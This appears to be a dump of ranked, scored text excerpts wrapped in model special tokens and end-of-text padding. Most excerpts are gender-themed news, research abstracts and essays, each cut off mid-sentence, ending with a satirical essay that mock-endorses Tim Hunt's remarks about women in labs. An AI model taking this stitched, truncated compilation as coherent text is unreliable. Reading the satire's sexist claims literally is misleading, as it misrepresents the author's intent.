don’t discuss it. + +"We’re collectively more tolerant of the harm that happens to men and boys" Glen Poole + +On the day that the former manager of a charity supporting victims of domestic violence snorted at the idea that men’s issues are worthy of debate, more than 2,000 men and boys were victims of +================================================================================ +Rank = 7; Score = 765952.0 +<|begin_of_text|>Choice of Majors: Are Women Really Different from Men? + +NBER Working Paper No. 23735 + +Issued in August 2017 + +NBER Program(s):Economics of Education, Labor Studies + +Recent work suggests that women are more responsive to negative feedback than men in certain environments. We examine whether negative feedback in the form of relatively low grades in major-related classes explains gender differences in the final majors undergraduates choose. We use unique administrative data from a large private university on the East Coast from 2009-2016 to test whether women are more sensitive to grades than men, and whether the gender composition of major-related classes affects major changes. We also control for other factors that may affect a student's final major including: high school student performance, gender of faculty, and economic returns of majors. Finally, we examine how students' decisions are affected by external cues that signal STEM fields as masculine. The results show that high school academic preparation, faculty gender composition, and major returns have little effect on major switching behaviors, and that women and men are equally likely to change their major in response to poor grades in major-related courses. Moreover, women in male-dominated majors do not exhibit different patterns of switching behaviors relative to their male colleagues. Women are, however, more likely to switch out of male-dominated STEM majors in response to poor performance compared to men. Therefore, we find that it takes multiple signals of lack of fit into a major (low grades, gender composition of class, and external stereotyping signals) to impel female students to switch majors. + +Acknowledgments + +Machine-readable bibliographic record - MARC, RIS, BibTeX + +Document Object Identifier (DOI): 10.3386/w23735 + +Users who downloaded this paper also downloaded* these:<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 8; Score = 757760.0 +<|begin_of_text|>Next month, yet another version of Charlotte Bronte’s novel Jane Eyre will be adapted for the screen, this time as a major motion picture by director Cary Fukunaga. While there have already been many film and TV versions of the book, Fukunaga’s take promises a sharp departure from the mild, romantic presentations of the past, taking on a much darker and menacing tone. (Watch the trailer.) + +This new look at Jane Eyre has got me wondering about the appeal the novel has today. The classic is often construed as a girls’ novel, the mother of the romance genre. As I remember it, girls usually choose it in school, while boys preferred something more brash, like Hemingway’s A Farewell to Arms. It’s often organized as “women’s fiction” (a bizarre and seemingly arbitrary term that apparently includes both Harper Lee’s To Kill a Mockingbird, and Snooki’s A Shore Thing). + +I’ll admit, I’ve avoided Jane Eyre, as well as Pride and Prejudice and other similarly categorized novels, based purely on the way they’ve been marketed to the genders. Because I’m a guy, it never seemed like these books were for me to read. But I now find myself anticipating the new Jane Eyre film, which will star Mia Wasikowska and Dame Judi Dench. It actually makes the book look, well, cool. + +Don’t like ads? Become a supporter and enjoy The Good Men Project ad free + +If Fukunaga’s adaptation of Jane Eyre brings out the strength in Jane’s character, it also seems like it will appeal to more men. It appears to tell the tale in a more traditionally masculine way: the trailer conveys a sense of imminent danger, spiritual conflict, and brooding mystery. Perhaps it will inspire more men to pick up the zombie-free version of the novel. I’ll be among them. + +In the wake of Jane Slayer, which re-imagines Jane as a zombie-slaying heroine (part of a trend that also includes Pride and Prejudice and Zombies), people are beginning to recognize Bronte’s gothic influences. The story of Jane Eyre, it turns out, is a complicated and nuanced tale not merely of love gone bad. At its core is a story about character, morality, and independence. + +The movie also appears to emphasize Jane as a heroine—an essential part of the story, and a designation Jane doesn’t often receive. There has been some recent debate over this: last week, +================================================================================ +Rank = 9; Score = 757760.0 +<|begin_of_text|>Valerie (Vimalasara) Mason–John, president of the Buddhist Recovery Network, promotes recovery alternatives grounded in dharma and diversity. + +Rod Meade Sperry: You are the president of the Buddhist Recovery Network. What is the BRN’s role? + +Valerie Mason-John: The BRN was started so people involved in different Buddhist-inspired recovery programs could pool ideas and work together. I think its role is to popularize Buddhist recovery so people see it as a mainstream complement— or alternative —to programs like 12-step recovery. I’m in touch with some recovery houses and they say the Buddhist-inspired approach is great. They want to know about alternatives, because not everybody wants to do 12 steps. + +One of the things the Buddhist Recovery Network emphasizes is the need for more diversity in the recovery movement. + +I’ve been in recovery for a long while. Many years ago, when I went along to help at meetings, I was freaked out because it was just practically all men and practically all white. It didn’t reflect me at all. I was at a recovery conference and there was only one other person there of African descent! Yet we know that the war on drugs in the United States has often been a war on Black people, a war on Hispanic people. + +Even in the Buddhist recovery community, it has been dominantly male and there’s a real gap as far as women and people of color are concerned. We teach Buddhism through the lens of the Western gaze, unless you came from an Asian–American community. Buddhism was brought to the West by the Sharon Salzbergs, the Jack Kornfields, people like that. They brought it here, which was brilliant, but it’s seen through that Western gaze. But it’s not so accessible to certain people or communities. + +Do you have to be Buddhist to do Buddhist recovery? + +No. We’re using the teachings to help people with recovery. We do use Buddhist principles like the five precepts, which are recited at the meeting. But Buddhist recovery can be helpful to someone who’s a Christian, who’s a Hindu, who’s a Muslim. + +What makes the Buddhist-based approach to recovery different from the 12-step program or other forms of recovery? + +Twelve steps comes out of the Christian community and Buddhist recovery is based on the Buddhist teachings, which are all about coming out of suffering. In a way, it’s interesting we call it Buddhist recovery, because we could say that the whole path of dharma is about recovery, whether you’re an addict +================================================================================ +Rank = 10; Score = 737280.0 +<|begin_of_text|>Emergent attitudes toward brilliance The distribution of women and men across academic disciplines seems to be affected by perceptions of intellectual brilliance. Bian et al. studied young children to assess when those differential perceptions emerge. At age 5, children seemed not to differentiate between boys and girls in expectations of “really, really smart”—childhood's version of adult brilliance. But by age 6, girls were prepared to lump more boys into the “really, really smart” category and to steer themselves away from games intended for the “really, really smart.” Science, this issue p. 389 + +Abstract Common stereotypes associate high-level intellectual ability (brilliance, genius, etc.) with men more than women. These stereotypes discourage women’s pursuit of many prestigious careers; that is, women are underrepresented in fields whose members cherish brilliance (such as physics and philosophy). Here we show that these stereotypes are endorsed by, and influence the interests of, children as young as 6. Specifically, 6-year-old girls are less likely than boys to believe that members of their gender are “really, really smart.” Also at age 6, girls begin to avoid activities said to be for children who are “really, really smart.” These findings suggest that gendered notions of brilliance are acquired early and have an immediate effect on children’s interests. + +The career aspirations of young men and women are shaped by societal stereotypes about gender (1, 2). For example, the stereotype that men are better than women at mathematics (3) impairs women’s performance in this domain (4, 5) and undermines their interest in mathematics-intensive fields (6, 7). However, popular beliefs about ability associate not only specific cognitive processes (e.g., mathematical reasoning) with a particular gender but also the overall amount of cognitive ability. It is commonly assumed that high-level cognitive ability (brilliance, genius, giftedness, etc.) is present more often in men than in women (8–11). This “brilliance = males” stereotype has been invoked to explain the gender gaps in many prestigious occupations (12–15). However, little is known about the acquisition of this stereotype. The earlier children acquire the notion that brilliance is a male quality, the stronger its influence may be on their aspirations. The four studies reported here (N = 400 children) show that, by the age of 6, girls are less likely than boys to believe that members of their gender are “really, really smart”—a child-friendly way of referring to brilliance. Also +================================================================================ +Rank = 11; Score = 712704.0 +<|begin_of_text|>This article updated from original, which appeared in Role Reboot. + +"Stop interrupting me." + +"I just said that." + +"No explanation needed." + +In fifth grade, I won the school courtesy prize. In other words, I won an award for being polite. My brother, on the other hand, was considered the class comedian. We were very typically socialized as a "young lady" and a "boy being a boy." Globally, childhood politeness lessons are gender asymmetrical. We socialize girls to take turns, listen more carefully, not curse and resist interrupting in ways we do not expect boys to. Put another way, we generally teach girls subservient habits and boys to exercise dominance. + +I routinely find myself in mixed-gender environments (life) where men interrupt me. Now that I've decided to try and keep track, just out of curiosity, it's quite amazing how often it happens. It's particularly pronounced when other men are around. + +This irksome reality goes along with another -- men who make no eye contact. For example, a waiter who only directs information and questions to men at a table, or the man last week who simply pretended I wasn't part of a circle of five people (I was the only woman). We'd never met before and barely exchanged 10 words, so it couldn't have been my not-so-shrinking-violet opinions. + +These two ways of establishing dominance in conversation, frequently based on gender, go hand-in-hand with this last one: A woman, speaking clearly and out loud, can say something that no one appears to hear, only to have a man repeat it minutes, maybe seconds later, to accolades and group discussion. + +After I wrote about the gender confidence gap recently, of the 10 items on a list, the one that resonated the most was the issue of whose speech is considered important. In sympathetic response to what I wrote, a person on Twitter sent me a cartoon in which one woman and five men sit around a conference table. The caption reads, "That's an excellent suggestion, Miss Triggs. Perhaps one of the men here would like to make it." I don't think there is a woman alive who has not had this happen. + +The cartoon may seem funny, until you realize exactly how often it seriously happens. And -- as in the cases of Elizabeth Warren or say, Brooksley Born -- how broadly consequential the impact can be. When you add race and class to the equation the incidence of this marginalization is even higher. + +This +================================================================================ +Rank = 12; Score = 663552.0 +<|begin_of_text|>45% of video gamers, and 46% of game purchasers, are women. More complex storylines, more personalized characters, more acceptance of ‘geekiness’ as something to be proud of and a wider variety of games available are just a few of the reasons why gaming is no longer being seen as a boys-only club. Women are finding their place in the gaming world., a YouTuber and gamer with 60,000 subscribers, is excited about the change. “More and more I feel like it is normal for a woman to play video games too. It's no longer "a guy thing". Growing up I often heard "What, you play video games?! That's so awesome, girls never play video games!", but now when you tell someone you play video games you'd sooner get the question what kind of games you're into, which is really nice.” GirlGamerGaB, a YouTuber and gamer with 60,000 subscribers, is excited about the change. “More and more I feel like it is normal for a woman to play video games too. It's no longer "a guy thing". Growing up I often heard "What, you play video games?! That's so awesome, girls never play video games!", but now when you tell someone you play video games you'd sooner get the question what kind of games you're into, which is really nice.” + +And yet, even the fantasy world still isn’t equal. But from gamers, to game developers, to women in games, we still have a long way to go before gaming becomes an gender-equal world....for women who play games: On paper, a female gamer’s customer experience should be no different to that of a man’s. In practice, the communal nature of gaming means that male gamers can make life pretty unpleasant for a female gamer… a ‘side effect’ of the product she didn’t sign up for. Women face roughly three times more harassment than men when playing online. Gamer and YouTuber Yasmin Uddin (known as Yammy xox) said she experienced sexism first hand, “mostly during games like Call of Duty and Gears of War. I was ashamed to speak in online game chat as I felt as if I’d be ridiculed for my voice.... I’d be told to ‘get back into the kitchen.” + +It’s not always that aggressive – but unwanted attention is still a distraction to women just looking to play the game. “A lot of people try to make flirty conversation +================================================================================ +Rank = 13; Score = 659456.0 +<|begin_of_text|>The history of geek culture and its exclusion of women + +Updated about 2 hours ago Fri 6 Nov 2015, 1:04am + +Computing never used to be seen as a masculine pursuit, but since the 80s we have witnessed a fascinating recalibration of tech and gender, as the beta males became alpha, writes Jeff Sparrow. + +The first 'computers' had names. They were Kay McNulty, Marlyn Wescoff, Fran Bilas, Ruth Lichterman, Adele Goldstine and Betty Snyder. + +In the 1940s, these women programmed the US Army's Electronic Numerical Integrator And Computer (ENIAC), known to the press at the time as "the giant brain" and recognised today as the first electronic general-purpose computer. + +ENIAC's operators were chosen from the clerks - known as 'computers' - who had previously been working out ballistic tables with desk calculators. Most were women, and because the job entailed crawling within ENIAC to manipulate its switches and cables, they came to understand the machine better than anyone. + +That's just one example of the important role women played in pioneering today's high technology. + +Famously, the very first piece of computer programming was performed by Ada Lovelace, who, in the 1840s, wrote an algorithm designed to be employed by Charles Babbage's "difference engine". Grace Hopper came up with the first computer compiler in 1952 and then established the programming language COBOL. Mary Keller helped develop BASIC; Radia Perlman built some of the protocols of the early internet. + +As Brendan Keogh explains in his fascinating essay about the development of computer gaming, many of these advances took place in male-dominated institutions such as military facilities and engineering laboratories. Nevertheless, during the postwar decades, the proportion of women studying computer science was growing rapidly, faster than in any professional fields. + +And then something happened. + +In a piece for NPR, Steve Henn notes that the participation rates for women in computer science began to fall in the mid-80s: that is, at about the same time as personal computers entered the home. + +At first, the association seems completely counter-intuitive. You'd think home access to computing would increase gender parity. + +But as Henn says: + +These early personal computers weren't much more than toys. You could play pong or simple shooting games, maybe do some word processing. And these toys were marketed almost entirely to men and boys. This idea that computers +================================================================================ +Rank = 14; Score = 651264.0 +<|begin_of_text|>WASHINGTON — Several Democratic members of the Congressional Black Caucus (CBC) agreed Thursday that racism is behind African Americans serving prison sentences at a disproportionate rate, but none of them thought systemic sexism was a factor in men being over 90 percent of federal prisoners. + +The disparity between men and women is much larger then the one between whites and blacks when it comes to criminal justice. In 2011, black people in America were 2.5 times more likely to be stopped on the street by the police than white folk. That same year, men were 8.3 times to face a street stop then women. + +Likewise, the disparity between men and women serving sentences in state and federal penitentiaries was much larger than it was for black people and white people in 2011. That year, African Americans were 5.8 times more likely than whites to be in a federal or state prison and men were 15.8 times more likely to be those same prisons than women. + +The Daily Caller spoke to five Democratic CBC members who believed that a racist system was to blame for the disparity between whites and blacks in the justice system. When asked about how sexism could then play a role in that same system, they gave various different answers. None agreed with the premise that “systemic sexism” could be at play. + +Congressional Black Caucus chairman Rep. G.K. Butterfield said, “I’m not going to say that men commit crimes at a higher frequency then women because I don’t know that to be true. I don’t really know the answer to it.” + +Two other lawmakers — Texas Democratic Rep. Marc Veasey and Mississippi Democratic Rep. Bennie Thompson — refused to entertain the question. New York Democratic Rep. Charlie Rangel and Washington, D.C Democratic Rep. Eleanor Holmes Norton believed that men and women had distinct differences leading to the different crime statistics. + +“Men and women aren’t comparable groups to compare when it comes to crime,” Norton told TheDC. She described differences between men and women as being “old as the millennia.” + +Rangel was more direct and suggested men are genetically predisposed to violence. + +“Men generally, which has nothing to do with racism, have a tendency to be disorderly more than women, that goes without saying. There’s more goddamn [male] prizefighters than women,” Rangel said. He added, “Men are built differently, men play football, they’re boxers, they do things that require strength, they’re more disorderly, they get into more trouble.” +================================================================================ +Rank = 15; Score = 647168.0 +<|begin_of_text|>How a product exclusively for women beat the odds to make the Top 3 on Product Hunt + +Huong at Magpie Blocked Unblock Follow Following Mar 14, 2016 + +Before Magpie went live on Product Hunt, everyone told us that Product Hunt was not necessarily the best place for us, since our product is developed exclusively for the use of female users and most Product Hunters are men. Just for some context about what Magpie does — we’re a female travelers club, designed to help women easily find local friends sharing common interests, wherever they go. + +The companies featured on Product Hunt are mostly started by men, and female hunters and makers are in the minority. But that did not deter us from giving it a try. Throughout the day, we watched in awe as the support came streaming in. Starting the day at the bottom, we steadily climbed to where we ended the day, solidly in the top 3 and with the highest number of upvotes and comments. + +It’s never too late to vote for us, by the way, if you’d like to share us some love :-) We ended the day with over 600 upvotes as supporters continued to vote for us all over the world. We also saw very encouraging results: our sign-ups increased 20 times, and our site traffic increased 10 times. We also received a lot of press interview requests, partnership opportunities, and insightful user feedback. One fun fact: almost half of our upvotes came from women, making us probably the most upvoted product by PH women voters, woohoo!!! + +We had so much fun on Product Hunt on the auspicious Mag(Pi)e day ;-) and would love to share what we learn in case helpful to other startups going to launch on Product Hunt. + +Though we ended the day with the highest number of upvotes (over 500!) and comments, we still ranked second on the site. We found out that this was due to Product Hunt’s intriguing ranking methods that take in factors like organic search and how active your voters are on Product Hunt. + +Our Top Advice for Going Live on Product Hunt + +Getting featured takes some time. + +Product Hunt members can “hunt” products, but this doesn’t necessarily mean that they’re going to go live. Going live requires extra conversation with the Product Hunt team. They tend to be pretty responsive (especially over their super-useful live chat) but they also get bogged down pretty often because they all work really hard. Don’t be put off if you send them an email about being featured +================================================================================ +Rank = 16; Score = 626688.0 +<|begin_of_text|>Story highlights Don McPherson: Not enough men speak out against domestic violence against women + +He says violence toward women affects men, too. Yet culture ignores, propagates it + +He says campaign "One million men. One million promises," to draw attention to it + +McPherson: Men can help in many small ways. Set example in treatment of women + +Dallas Cowboys tight end Jason Witten is the 2012 Walter Payton NFL Man of the Year. Why? In large part because of Witten's tireless commitment to ending domestic violence. As a former professional football player and longtime domestic violence prevention advocate, I understand how gratifying it is to receive this honor from the NFL. For the men engaged in this critical issue, it can be a lonely road. + +But now Witten has company in Dallas. Moved to action by a series of recent slayings, Mayor Mike Rawlings announced the launch of a citywide awareness campaign to show that domestic violence — and the culture that ignores or perpetuates it — has no home in his city. He's hoping at least 10,000 men show up to rally with that message on Dallas' City Hall Plaza later this month. + +A drive to end domestic violence, led by men. It's an idea whose time has come, again and again; some men have been pushing it for decades. But now many are hearing the call. + +As Rawlings said in a recent press conference: "In the past this has been viewed as a women's issue, but it ain't. It's our problem." The problem is not confined to a shocking spate of killings in Dallas, or to one major U.S. city. The New York Police Department reportedly receives 700 domestic violence calls every day. Domestic violence costs the United States more than $9 billion a year. More than 603 million women live in countries where domestic violence is not a crime. Globally, at least one in three women and girls are beaten or sexually abused in their lifetimes, usually at the hands of men. + +Donald McPherson + +What can men do? + +Men do not just need to stop being violent. The vast majority of men are not violent. But men do need to stop being silent. Calling violence against women, whether street harassment or sexual harassment or rape or murder, a "women's issue" allows men to ignore it as if we have no responsibility for it or stake in ending it. We all have grandmothers, mothers, sisters, daughters and female friends and colleagues. Our +================================================================================ +Rank = 17; Score = 606208.0 +<|begin_of_text|>Media playback is unsupported on your device Media caption Campaigners say the hostel curfews are ''discriminatory'' + +Young female students in the Indian capital, Delhi, are fighting to assert their right to public spaces with a campaign called Pinjra Tod (Break The Cage). The BBC's Geeta Pandey joins them for a night as they go out to "claim the streets" and fill them with their "dreams and desires". + +Just as night falls, about 60 young women and men begin marching through some of Delhi university's premier colleges. + +Many are carrying posters, they shout slogans, halt outside women's hostels, recite poems and break out into impromptu dances. + +"We don't need no false protection, you can't cage half the nation," they sing. + +One young man plays a drum hanging around his neck, while a woman wearing a red sari gives a lively speech. + +Image caption We are saying this is not about women's safety really, this is about moral policing" + +At regular intervals, the participants - Delhi university students past and present - whistle and clap in approval or chant "shame, shame". + +The issue that has brought all these men and women out on to the streets is what is called the "curfew hour" in women's hostels - the deadline by which residents must return to their rooms. + +"It is discriminatory," says Devangana Kalita, a 26-year-old researcher and co-founder of the Pinjra Tod movement. + +"Curfews and deadlines in the name of providing protection and safety are actually mechanisms of reproducing patriarchy. We are saying this is not about women's safety really, this is about moral policing." + +Image caption Protesters say the march to claim the streets by female students is "unprecedented" and "historic". + +Students say most women's hostels - whether run by the university or privately-owned - follow curfew hours. Some lock their gates as early as 6:30pm or 7:30pm while a few allow students to remain out until a little later. + +They say while curfew times are stringently enforced in women's hostels and those who break them run the risk of being expelled, hostels for men, which also have curfew hours on paper, rarely enforce them. + +Libraries and laboratories in the university are open until much later - till midnight or in some places, even until 2am - and curfew hours mean women have no access to them. + +"The university infantilises you," says Ms Kal +================================================================================ +Rank = 18; Score = 585728.0 +<|begin_of_text|>Pakistan is preparing for its first census in 19 years. Here are some facts about the upcoming enumeration exercise of the sixth most populous nation in the world. + +Read: All set for country’s biggest census exercise + +A third sex + +For the first time, transsexual people will be counted separately, according to representatives of this historically recognised but often persecuted community in the country. + +The forms had been printed well in advance of court decisions to include them in the count. Now enumerators have been informed that those surveyed will have three numeric choices for their gender: 1 for men, 2 for women, 3 for those who declare themselves transsexuals. + +Only nine languages + +Language is considered an essential tool in evaluating the makeup of multi-ethnic Pakistan — but only nine of the country's estimated 70 will be listed, to the dismay of many communities. + +No regional languages from sparsely populated Gilgit-Baltistan will be included nor will Gujrati — spoken by some Muslim immigrants from India who believe the lack of recognition will drive their mother-tongue towards oblivion. + +Examine: The future of Gujarati language in Pakistan + +Faith matters + +The census will provide an insight into the true number of religious minorities, especially Christians and Hindus. Estimates are approximate and disputed, ranging from 2 to 10 million for the former and 2.5 to 4.5m for the latter. + +Citizens can declare themselves Muslim, Christian, Hindu or Ahmadi. + +Otherwise, they can be “members of scheduled castes” — members of marginalised Hindu families, or “other”. There are no separate options for Sikhs, Parsis or Baha'i. + +Feeling flush + +One box asks households how many toilets they have — a particularly salient question in Pakistan, where the United Nations estimates up to 40 per cent of people defecate in the open air with dramatic health consequences, especially for children. + +Nationality + +The census gives two nationality options: Pakistani or foreign. + +But the army, which will conduct a parallel count, plans to be more precise mainly because of the country's Afghan refugees who are accused of everything from terrorism to trafficking. + +Many local officials fear Afghans could be counted as local and skew demography in favour of ethnic Pashtuns, whose political parties would benefit as a result. + +On the other hand, the estimated six million Pakistanis working abroad will not be counted. No information will be collected on internal migration — necessary to assess the political weight of a province where many people +================================================================================ +Rank = 19; Score = 552960.0 +<|begin_of_text|>FRESHMEN crowded the lecture hall at 9am for Humanities 110, the first class of their college careers. Elizabeth Drumm, the head of the programme, made some introductory remarks, her voice quavering. As some faculty members moved to take their places at a panel discussion, three demonstrators emerged from the wings of the auditorium. “We’re protesting Hum 110 because it’s Eurocentric,” one began. “I’m sorry, this is a classroom space and this is not appropriate,” Ms Drumm said, immediately cancelling the lecture. Thus began another academic year at Reed College, a liberal arts college in Portland, Oregon. + +Last academic year, a dozen or so students continuously occupied the three-day-a-week lecture series by sitting in front of the auditorium with cardboard signs, sometimes taping their mouths in protest at the absence of non-white voices in the syllabus. One even took to lecturing the freshman class on the podium from an alternate curriculum before the start of each session. But this year, the college’s president sent out an e-mail outlining the school’s dissent policy 16 minutes before the lecture began, warning that the administration would act against potential violations. Reed College students were ranked as the most liberal and the second most studious in Princeton Review’s survey of its top 382 liberal arts colleges. That compound of leftist politics and serious scholarship proved unstable last year as activists managed to cow the college’s administration, students and faculty alike. + +Get our daily newsletter Upgrade your inbox and get our Daily Dispatch and Editor's Picks. + +The protesters argue that the Humanities programme is racist because it ignores many of the world’s great civilisations and because its authors are overwhelmingly male and white. They point out that black students represent less than 3% of the school’s 1,400 students and argue that the administration has not done enough to support them. A good portion of the student body appear to support their goals and tactics. + +Assistant professor Lucia Martinez Valdivia, who describes herself as mixed-race and queer, asked protesters not to demonstrate during her lecture on Sappho last November. Ms Valdivia said she suffered from post-traumatic stress disorder and doubted her ability to deliver the lecture in the face of their opposition. At first, demonstrators announced they would change tactics and sit quietly in the audience, wearing black. After her speech, a number of them berated her, bringing her to tears. + +Demonstrators said Ms Valdivia was guilty of a variety of offences: she was a “race +================================================================================ +Rank = 20; Score = 552960.0 +<|begin_of_text|>Texas will not lack for influence in the U.S. House when the new Congress convenes in January. Despite representing a tiny percentage of Americans, white males from the Lone Star state will occupy six of the 21 committee chairmanships. Not bad, considering white Texan men account for only 3.35% of the U.S. population. + +The half dozen committee chairmanships will also represent the largest number for a state delegation since at least 1979, according to The New York Times. + +The six Texas chairmen will be K. Michael Conaway (Agriculture), Mac Thornberry (Armed Services), Jeb Hensarling (Financial Services), Michael McCaul (Homeland Security), Pete Sessions (Rules), and Lamar Smith (Science, Space and Technology). + +Four of them—Hensarling, McCaul, Sessions and Smith—were chairmen of their committees during the last Congress. + +“The six committees that will be run by Texans starting in January all have sway over large federal programs and commercial interests, and over the operation of the House itself,” the Times’ Derek Willis wrote. “The Rules Committee is essentially an arm of the leadership; it determines the rules of debate for legislation on the House floor.” + +But Texas won’t have as much sway in the House as it once did. “The Republicans having six committee chairs is certainly unprecedented, but it probably won’t mean that the Texas delegation is as powerful as it was when it had the majority leader and majority whip,” Sean M. Theriault, a professor in the Department of Government at the University of Texas, referring to the years 1995-2003, said in an email to the Times. + +-Noel Brinkerhoff + +To Learn More: + +In New Congress, House Committees Will Carry a Strong Texas Accent (by Derek Willis, New York Times) + +House Republicans Choose White Men to Head 20 of 21 Committees (by Noel Brinkerhoff, AllGov)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 21; Score = 544768.0 +<|begin_of_text|>The Iranian-Saudi Proxy Wars Come to Mali + +BAMAKO, Mali — In a country where two-thirds of the adults are illiterate, it is a privileged few who have the chance to study at the Mustafa International School. + +Located in the western suburbs of Bamako, a few blocks from the U.S. Embassy, the college-level seminary has just 180 students — 150 men and 30 women. They engage in an intensive curriculum that encompasses theology, history, philosophy, Arabic, Farsi, and world religions. They work in the school’s computer suite, equipped with 12 desktop computers, and get three meals a day at the seminary’s expense. And they do it all under the watchful eyes of the late Ayatollah Ruhollah Khomeini, former supreme leader of the Islamic Republic of Iran, whose likeness gazes down on them from his portrait, which hangs above the bookshelves of the school’s library. + +These young students are part of Mali’s tiny Shiite community: a group of about 10,000 families nationally, in a country where the Sunni majority makes up an estimated 95 percent of the population of 15 million. + +They’re also the stuff of Saudi nightmares. + +Historically, West Africa has had a tolerant approach to religious differences, shunning — at least until recently — the sort of Sunni-Shiite sectarian rivalries that have plagued the Middle East in favor of a patchwork of beliefs that incorporate Sufism, Maliki Islam, and traditional animist practices. But Mali — home to seminaries with ties to Iran, like the Mustafa International School, and where diplomatic cables released by WikiLeaks this summer reveal that Saudi Arabia is scrambling to fund its own competing schools, mosques, and cultural projects — provides a case study in how the enmity between Sunni Islam and Shiite Islam may be being spread, via Iranian and Saudi proxies, to places thousands of miles from the Middle East. + +Unlike most of Mali’s private schools and universities, which charge hefty fees, the Mustafa International School selects students from outside the capital and gives them free room and board. Few of the students hail from Mali’s elite families; rather, they are selected via tests administered to Shiite youth across the country. The highest achievers are offered the chance to continue their study in Iran. + +The school is able to afford such generous support for its students because it is backed by an Iranian university in Qom, a city considered holy by Shiite Muslims and famed for its Islamic learning. The state-run University of +================================================================================ +Rank = 22; Score = 520192.0 +<|begin_of_text|>I’m a female scientist, and I agree with Tim Hunt. + +Allie Rubin Blocked Unblock Follow Following Jun 13, 2015 + +Nobel Prize winner Sir Tim Hunt recently caused a stir when he argued that male and female scientists should work independently, because women are a distraction to men in the lab. At a conference, he was quoted as saying, “Let me tell you about my trouble with girls… three things happen when they are in the lab… You fall in love with them, they fall in love with you and when you criticize them, they cry.” + +As improbable as it might sound, I am a female scientist, and I agree with Tim Hunt. + +First of all, Sir Tim’s comments are based on his personal experiences, and are therefore incontrovertible. Three hundred and fifty years ago, Isaac Newton saw an apple fall and decided that gravity existed. Three weeks ago, Tim Hunt saw a woman cry and decided that all women are unfit to be scientists. Science is based on observations, which are the same thing as universal proof. Even I know that, and I’m just a woman whose brain is filled to capacity with yoga poses and recipes for gluten-free organic soap. Once, I was lured into a trap in the woods because I followed a trail of Sex and the City DVDs for three miles into a covered pit. Do you really think I could do something as complicated as thinking about science? + +Second, Tim Hunt is correct in asserting that women are distracting to men in a lab setting, which greatly affects their productivity. Last month, my labmates and I had to burn our female coworker at the stake for witchcraft because we saw her holding an unwrapped tampon. Between building the stake, lighting an adequate fire, and waiting for her to die, we lost an entire day that we could otherwise have spent working. I make every effort to not distract my male colleagues; sometimes I have to work on my astrology charts from home when I’m menstruating or have leprosy, just so I can let the men in my lab focus on doing real science. It’s a small sacrifice I make that 